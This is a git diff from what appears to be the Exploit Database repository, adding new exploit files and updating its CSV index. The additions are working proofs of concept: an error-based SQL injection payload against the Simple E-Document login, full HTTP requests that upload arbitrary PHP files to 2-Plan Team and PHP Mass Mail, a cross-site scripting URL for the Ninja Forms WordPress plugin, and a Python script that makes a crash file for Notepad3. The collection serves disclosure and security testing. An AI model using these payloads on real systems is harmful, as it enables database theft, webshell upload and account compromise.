post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=97 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html \ No newline at end of file diff --git a/exploits/php/webapps/45877.txt b/exploits/php/webapps/45877.txt new file mode 100644 index 000000000..f7d7c6f82 --- /dev/null +++ b/exploits/php/webapps/45877.txt @@ -0,0 +1,48 @@ +# Exploit Title: Simple E-Document 1.31 - 'username' SQL Injection +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.tecorange.com/index.php/download-free-open-source-software/79-simple-e-document-free-open-source-document-and-paper-m +# Software Link: https://datapacket.dl.sourceforge.net/project/simplee-doc/simple_e_document_v_1_31.zip +# Version: 1.31 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# //[PATH]//login.php +# .... +#10 if(!isset($_POST['op'])) $_POST['op']=''; +#11 if(!isset($_POST['username'])) $_POST['username']=''; +#12 if(!isset($_POST['password'])) $_POST['password']=''; +#13 if(!isset($op)) $op=''; +#14 +#15 $op = $_POST['op']; +#16 $username= stripslashes($_POST['username']); +#17 $password= stripslashes($_POST['password']); +#18 $r_password = md5($password); +#19 +#20 $sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'"; +# .... + +# POC: +# 1) +# http://localhost/[PATH]/login.php +# +POST /PATH/login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 267 +username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||' +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 07:44:24 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 241 +Keep-Alive: timeout=5, max=97 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45878.txt b/exploits/php/webapps/45878.txt new file mode 100644 index 000000000..26322933b --- /dev/null +++ b/exploits/php/webapps/45878.txt @@ -0,0 +1,84 @@ +# Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-15 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://2-plan.com/ +# Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz +# Version: 1.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Users.. +# http://localhost/[PATH]/managefile.php?action=upload&id=1 +# + +POST /[PATH]/managefile.php?action=upload&id=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/managefile.php?action=showproject&id=1&mode=added +Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=--------------------------- +10091208795715239061851145440 +Content-Length: 1192 +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="numfiles" +1 +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="upfolder" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1-title" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1" +phpinfo.php +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="userfile1-tags" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="desc" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="visible[]" +-----------------------------10091208795715239061851145440 +Content-Disposition: form-data; name="sendto[]" +all +-----------------------------10091208795715239061851145440-- +HTTP/1.1 302 Found +Date: Wed, 14 Nov 2018 23:41:03 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=utf-8 +Transfer-Encoding: chunked + +GET /[PATH]/files/standard/ef/1/phpinfo_3978873.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 23:41:07 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=95 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45879.txt b/exploits/php/webapps/45879.txt new file mode 100644 index 000000000..55830c90c --- /dev/null +++ b/exploits/php/webapps/45879.txt @@ -0,0 +1,69 @@ +# Exploit Title: PHP Mass Mail 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://phpmassmail.sourceforge.io/ +# Software Link: https://netix.dl.sourceforge.net/project/phpmassmail/phpmassmail/1.0.0/phpmassmail.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/send.php +# +# http://localhost/[PATH]/upload/[FILE] + +# .... +#07 require("class.phpmailer.php"); +#08 +#09 $uploaddir = 'upload'; +#10 $key = 0; +#11 $tmp_name = $_FILES["userfile"]["tmp_name"][$key]; +#12 $name = $_FILES["userfile"]["name"][$key]; +#13 $sendfile = "$uploaddir/$name"; +#14 move_uploaded_file($tmp_name, $sendfile); +# .... + +POST /[PATH]/send.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/octet-stream +Content-Length: 716 +Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------265001916915724: undefined +Content-Disposition: form-data; name="userfile[]"; filename="phpinfo.php" + +-----------------------------265001916915724-- +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 19:27:39 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 719 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/send.php +# +# http://localhost/[PATH]/upload/[FILE] +# + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45880.txt b/exploits/php/webapps/45880.txt new file mode 100644 index 000000000..c69b7e2a0 --- /dev/null +++ b/exploits/php/webapps/45880.txt @@ -0,0 +1,29 @@ +# Exploit Title: Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting +# Date: 2018-11-15 +# Exploit Author: MTK +# Vendor Homepage: https://ninjaforms.com +# Softwae Link: https://wordpress.org/plugins/ninja-forms/ +# Version: Up to V3.3.17 +# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox +# CVE : CVE-2018-19287 + +# Plugin description: +# Ninja Forms is the ultimate FREE form creation tool for WordPress. Build forms within minutes +# using a simple yet powerful drag-and-drop form creator. For beginners, quickly and easily +# design complex forms with absolutely no code. For developers, utilize built-in hooks, +# filters, and even custom field templates to do whatever you need at any step in +# the form building or submission using Ninja Forms as a framework. + +# POC + +|_1_| + +http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date=">&nf_form_filter&paged=1 \ No newline at end of file diff --git a/exploits/windows/local/39666.txt b/exploits/windows/local/39666.txt index 33e04bb6a..a9509e2fe 100644 --- a/exploits/windows/local/39666.txt +++ b/exploits/windows/local/39666.txt @@ -2,7 +2,7 @@ Sources: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf https://github.com/sam-b/CVE-2014-4113 -EDB Mirror: https://www.exploit-db.com/docs/39665.pdf +EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf Trigger and exploit code for CVE-2014-4113: diff --git a/exploits/windows/local/40823.txt b/exploits/windows/local/40823.txt index 8a017261d..4ad13d959 100644 --- a/exploits/windows/local/40823.txt +++ b/exploits/windows/local/40823.txt @@ -2,7 +2,7 @@ Complete Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip Presentation: -https://www.exploit-db.com/docs/40822.pdf +https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016 diff --git a/exploits/windows_x86-64/dos/45869.py b/exploits/windows_x86-64/dos/45869.py new file mode 100755 index 000000000..d7ccf799f --- /dev/null +++ b/exploits/windows_x86-64/dos/45869.py @@ -0,0 +1,29 @@ +# Exploit Title: Notepad3 1.0.2.350 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.rizonesoft.com/ +# Software Link: https://netix.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350.exe +# Software Link: https://datapacket.dl.sourceforge.net/project/notepad3/Notepad3%20Build%20350/Notepad3-1.0.2.350_x86.zip +# Version: 1.0.2.350 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# File / Set Encryption Passphrase / Encrypt using Passphrase + +#!/usr/bin/python + +buffer = "A" * 256 + +payload = buffer +try: + f=open("exp.txt","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4730679c5..b64d34edb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6190,6 +6190,7 @@ id,file,description,date,author,type,platform,port 45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows, 45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64, 45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows, +45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -6674,7 +6675,7 @@ id,file,description,date,author,type,platform,port 4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",local,windows, 4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,local,multiple, 4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,local,windows, -4218,exploits/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,local,windows, +4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass",2007-07-24,shinnai,local,windows, 4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows, 4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,local,aix, 4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,local,aix, @@ -6701,9 +6702,9 @@ id,file,description,date,author,type,platform,port 4460,exploits/linux_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",local,linux_x86-64, 4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,local,solaris, 4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,local,solaris, -4517,exploits/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,local,windows, +4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass",2007-10-11,shinnai,local,windows, 4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,local,windows, -4553,exploits/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,local,windows, +4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / Disable Functions Bypass",2007-10-22,shinnai,local,windows, 4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,local,multiple, 4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,local,multiple, 4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,local,multiple, @@ -9733,7 +9734,7 @@ id,file,description,date,author,type,platform,port 41999,exploits/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",local,linux, 42000,exploits/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",local,windows, 42020,exploits/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",local,windows, -42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux, +42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation",2017-05-22,"Google Security Research",local,linux, 42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux, 42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows, 42076,exploits/linux/local/42076.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux, @@ -9765,7 +9766,7 @@ id,file,description,date,author,type,platform,port 42310,exploits/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Local Privilege Escalation",2017-07-10,LiquidWorm,local,windows, 42319,exploits/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Local Privilege Escalation",2017-07-13,geoda,local,windows, 42325,exploits/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",local,windows, -42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",local,macos, +42334,exploits/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation",2017-07-18,"Mark Wadham",local,macos, 42356,exploits/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",local,linux, 42357,exploits/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",local,linux, 42368,exploits/windows_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,local,windows_x86-64, @@ -9934,7 +9935,7 @@ id,file,description,date,author,type,platform,port 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows, 45565,exploits/windows_x86-64/local/45565.py,"Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)",2018-10-09,"Matteo Malvica",local,windows_x86-64, 44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows, -44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, +44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Local Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, 44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware, 44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows, 44652,exploits/linux/local/44652.py,"DynoRoot DHCP Client - Command Injection",2018-05-18,"Kevin Kirsche",local,linux, @@ -9945,7 +9946,7 @@ id,file,description,date,author,type,platform,port 44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86, 44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux, 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android, -44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, +44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, 44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, @@ -9996,7 +9997,7 @@ id,file,description,date,author,type,platform,port 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux, 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows, 45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows, -45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris, +45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation",2018-08-02,mu-b,local,solaris, 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux, @@ -10103,6 +10104,9 @@ id,file,description,date,author,type,platform,port 45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux, 45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux, 45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos, +45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux, +45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple, +45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -35094,7 +35098,7 @@ id,file,description,date,author,type,platform,port 35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",webapps,php, 35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",webapps,php, 35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php, -35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php, +35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php, 35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php, 35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php, @@ -36936,7 +36940,7 @@ id,file,description,date,author,type,platform,port 38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php, 38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",webapps,xml, 38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",webapps,php, -38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,webapps,php, +38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php, 38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",webapps,cgi,5000 38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php, 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java, @@ -37715,7 +37719,7 @@ id,file,description,date,author,type,platform,port 39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",webapps,php,80 39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",webapps,cgi,80 39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",webapps,cgi, -39766,exploits/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,webapps,php, +39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass",2016-05-04,RicterZ,webapps,php, 39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",webapps,asp,80 39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",webapps,jsp,443 39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,webapps,php,80 @@ -40367,3 +40371,15 @@ id,file,description,date,author,type,platform,port 45856,exploits/php/webapps/45856.txt,"Pedidos 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80 45857,exploits/php/webapps/45857.txt,"Electricks eCommerce 1.0 - Persistent Cross-Site Scripting",2018-11-14,"Nawaf Alkeraithe",webapps,php,80 45858,exploits/php/webapps/45858.txt,"DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload",2018-11-14,"Ihsan Sencan",webapps,php,80 +45860,exploits/php/webapps/45860.txt,"Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)",2018-11-15,"Ihsan Sencan",webapps,php,80 +45861,exploits/php/webapps/45861.txt,"PHP-Proxy 5.1.0 - Local File Inclusion",2018-11-15,"Ameer Pornillos",webapps,php,80 +45862,exploits/php/webapps/45862.txt,"BitZoom 1.0 - 'rollno' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45863,exploits/php/webapps/45863.txt,"Net-Billetterie 2.9 - 'login' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45864,exploits/php/webapps/45864.txt,"Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45868,exploits/php/webapps/45868.txt,"EverSync 0.5 - Arbitrary File Download",2018-11-15,"Ihsan Sencan",webapps,php,80 +45875,exploits/php/webapps/45875.txt,"Meneame English Pligg 5.8 - 'search' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, +45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php, +45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, +45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, +45880,exploits/php/webapps/45880.txt,"Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,